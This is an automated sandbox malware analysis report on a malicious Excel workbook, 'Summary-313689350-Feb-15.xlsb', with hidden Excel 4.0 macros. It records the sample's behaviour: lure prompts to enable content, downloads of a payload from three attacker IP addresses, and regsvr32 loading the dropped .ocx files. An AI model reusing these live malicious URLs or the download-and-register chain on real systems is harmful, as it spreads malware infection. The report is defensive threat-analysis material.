Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Summary-313689350-Feb-15.xlsb

Overview

General Information

Sample Name:Summary-313689350-Feb-15.xlsb
Analysis ID:572924
MD5:494a7ce828bec65273a9b49cefea91d7
SHA1:dfab2f0d4759820ef1a769bbaa2d79b64218b7c9
SHA256:e0b0146bdaabe240d92056c5b211e0b2d858f81aade2e06ca28f59bc2a229bed
Infos:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Sigma detected: Excel Network Connections
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2556 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2712 cmdline: regsvr32 C:\ProgramData\Hroser1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2548 cmdline: regsvr32 C:\ProgramData\Hroser2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1136 cmdline: regsvr32 C:\ProgramData\Hroser3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    System Summary

    barindex
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Hroser1.ocx, CommandLine: regsvr32 C:\ProgramData\Hroser1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2556, ProcessCommandLine: regsvr32 C:\ProgramData\Hroser1.ocx, ProcessId: 2712
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 185.141.26.236, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2556, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2556, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://185.141.26.236/6516776391132270.datAvira URL Cloud: Label: malware
    Source: http://185.252.215.41/6516776391132270.datAvira URL Cloud: Label: malware
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.141.26.236:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.141.26.236:80
    Source: global trafficHTTP traffic detected: GET /6516776391132270.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.141.26.236Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /6516776391132270.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.252.215.41Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /6516776391132270.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.32Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 188.165.62.32
    Source: unknownTCP traffic detected without corresponding DNS query: 185.252.215.41
    Source: unknownTCP traffic detected without corresponding DNS query: 185.141.26.236
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 15 Feb 2022 21:55:38 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 15 Feb 2022 21:54:57 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 15 Feb 2022 21:54:57 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\315C07.pngJump to behavior
    Source: global trafficHTTP traffic detected: GET /6516776391132270.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.141.26.236Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /6516776391132270.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.252.215.41Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /6516776391132270.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.32Connection: Keep-Alive

    System Summary

    barindex
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 1 PROTECTED VIEW Be careful . files from the Internet can contain viruses. Unless y
    Source: Screenshot number: 4Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content If you are using a mobi
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 1 PROTECTED VIEW Be careful . files from the Internet can contain viruses. Unless y
    Source: Screenshot number: 8Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content If you are using a mobi
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing CD PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 0Screenshot OCR: Enable Content CD SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing 1 PROTECTED VIEW Be careful . files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1Screenshot OCR: Enable Content (D SECURITY WARNING Macros have been disabled. Enable Content Oj If you are using
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet: Vtreytr contains: urlmon
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet: Vtreytr contains: urlmon
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbInitial sample: EXEC
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1111
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa3
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa6
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Detr
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Detr
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa2
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Vtreytr
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Vtreytr
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd2
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrdferyy
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa11111
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa11111
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa3
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa6
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrd2
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa2
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Xwtrdferyy
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1
    Source: Summary-313689350-Feb-15.xlsbMacro extractor: Sheet name: Tiposa1111
    Source: 9C6E.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Hroser1.ocx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Hroser2.ocx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Hroser3.ocx
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Hroser1.ocxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Hroser2.ocxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 C:\ProgramData\Hroser3.ocxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Summary-313689350-Feb-15.xlsbJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC947.tmpJump to behavior
    Source: classification engineClassification label: mal80.expl.evad.winXLSB@7/4@0/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings5.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings6.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings7.bin
    Source: Summary-313689350-Feb-15.xlsbInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: 9C6E.tmp.0.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 2612Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 1724Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 1172Thread sleep time: -60000s >= -30000sJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts2
    Scripting
    Path Interception1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Virtualization/Sandbox Evasion
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
    Non-Application Layer Protocol
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts22
    Exploitation for Client Execution
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Disable or Modify Tools
    LSASS Memory1
    File and Directory Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth12
    Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Virtualization/Sandbox Evasion
    Security Account Manager2
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
    Ingress Tool Transfer
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Process Injection
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
    Scripting
    LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://185.141.26.236/6516776391132270.dat100%Avira URL Cloudmalware
